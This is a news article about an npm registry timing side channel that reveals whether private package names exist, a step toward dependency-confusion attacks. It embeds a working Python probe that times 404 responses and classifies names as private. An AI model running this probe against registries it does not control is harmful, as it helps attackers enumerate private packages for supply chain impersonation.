
New npm timing attack could lead to supply chain attacks
2022-10-12 15:16

Security researchers have discovered an npm timing attack that lets an attacker confirm whether a guessed private package name exists, so threat actors can publish malicious public packages under the same names and trick developers into installing them instead. The attack relies on a small difference in how long the registry takes to return a "404 Not Found" error for a private package compared with a package that does not exist at all.

While the response time difference is only a few hundred milliseconds, it is enough to tell a private package from a non-existent one, which is all that is needed to mount package impersonation attacks.

Npm includes a registry API that allows users to download existing packages, check for the existence of packages, and receive information about all packages under a specific scope.

Aqua Security discovered the npm timing attack by using this API to check for private packages they had created on npm themselves and comparing the response time of those 404 HTTP errors against checks for packages that do not exist.
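To make the measurement concrete, here is an added Python example written for this article; it is not code from Aqua Security, GitHub or npm. It times 404 responses for a target name and for freshly generated names that cannot exist, interleaves the two so network drift hits both equally, and compares medians against the baseline's spread instead of trusting a single request. The registry host, probe count, thresholds and the latency samples in the block are assumptions or constructed data, not figures reported by the research.

```python
"""Timing-based inference of whether an npm package name exists privately.

Added example for this article; it is not Aqua Security's or GitHub's code.
The registry host, probe count, threshold and all latency figures below are
assumptions or constructed data, not values reported by the research.
"""
import secrets
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

REGISTRY = "https://registry.npmjs.org"  # assumed; used only by the live probe below


def time_404_ms(name, timeout=10.0):
    """Time one GET /<name> against the registry and return milliseconds.

    A private package (exists, but not visible to this client) and a
    non-existent one both come back as 404, so the status carries no signal;
    the elapsed time is what the attack measures. Any other status is an error.
    """
    url = f"{REGISTRY}/{urllib.parse.quote(name, safe='@')}"  # @scope/name -> @scope%2Fname
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=timeout):
            pass
    except urllib.error.HTTPError as err:
        if err.code != 404:
            raise
        return (time.perf_counter() - start) * 1000.0
    raise RuntimeError(f"{name} is public; nothing to infer")


def baseline_name(scope=None):
    """A random name that certainly does not exist, in the same scope as the target."""
    leaf = "zz-" + secrets.token_hex(8)
    return f"{scope}/{leaf}" if scope else leaf


def probe_interleaved(target, n=20):
    """Alternate target probes with fresh random-name probes so that network
    drift during the run affects both series equally. Returns (target_ms, baseline_ms)."""
    scope = target.split("/")[0] if target.startswith("@") else None
    target_ms, baseline_ms = [], []
    for _ in range(n):
        target_ms.append(time_404_ms(target))
        baseline_ms.append(time_404_ms(baseline_name(scope)))
    return target_ms, baseline_ms


def classify(target_ms, baseline_ms, min_gap_ms=100.0, sigmas=3.0):
    """Compare the two latency series and decide whether the target looks private.

    Medians are used so that single slow requests (retransmits, GC pauses) do
    not dominate. The gap must exceed both a fixed floor and `sigmas` standard
    deviations of the baseline; a jittery baseline therefore yields no verdict,
    which is exactly the case a naive one-request comparison gets wrong.
    Returns (likely_private, median_target_ms, median_baseline_ms).
    """
    if len(target_ms) < 3 or len(baseline_ms) < 3:
        raise ValueError("need at least 3 samples per series")
    t_med = statistics.median(target_ms)
    b_med = statistics.median(baseline_ms)
    spread = statistics.pstdev(baseline_ms)
    gap = t_med - b_med
    return gap > max(min_gap_ms, sigmas * spread), t_med, b_med


# Constructed latency samples (milliseconds), not measurements from the real registry.
PRIVATE_LIKE = [640.0, 655.0, 648.0, 700.0, 651.0, 649.0]
MISSING_LIKE = [99.0, 104.0, 102.0, 97.0, 106.0, 100.0]
STABLE_BASELINE = [98.0, 105.0, 101.0, 110.0, 99.0, 103.0]
JITTERY_BASELINE = [50.0, 400.0, 90.0, 380.0, 60.0, 420.0]


if __name__ == "__main__":
    for label, series in (("private-like", PRIVATE_LIKE), ("missing-like", MISSING_LIKE)):
        verdict, t, b = classify(series, STABLE_BASELINE)
        print(f"{label:13s} median {t:6.1f} ms vs baseline {b:6.1f} ms -> private? {verdict}")
    # Gap of 265 ms is above the floor but inside the noisy baseline's 3-sigma band.
    verdict, t, b = classify([500.0] * 6, JITTERY_BASELINE)
    print(f"jittery       median {t:6.1f} ms vs baseline {b:6.1f} ms -> private? {verdict}")
```

Against a live registry, `probe_interleaved("@acme/billing-core")` (scope and name assumed) would supply the two series to `classify`; a few dozen interleaved samples are normally needed before the medians settle, and the statistical guard is what separates a real signal from CDN and network noise. Probing a registry you do not operate may breach its terms of service, so run this only against infrastructure you are authorised to test.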

"Because of these architectural limitations, we cannot prevent timing attacks from determining whether a specific private package exists on npm," GitHub told Aqua Security.

Organizations can defend against this by publishing public placeholder packages under the same names as their private packages, since npm does not allow two packages with the same name on the public registry.


News URL

https://www.bleepingcomputer.com/news/security/new-npm-timing-attack-could-lead-to-supply-chain-attacks/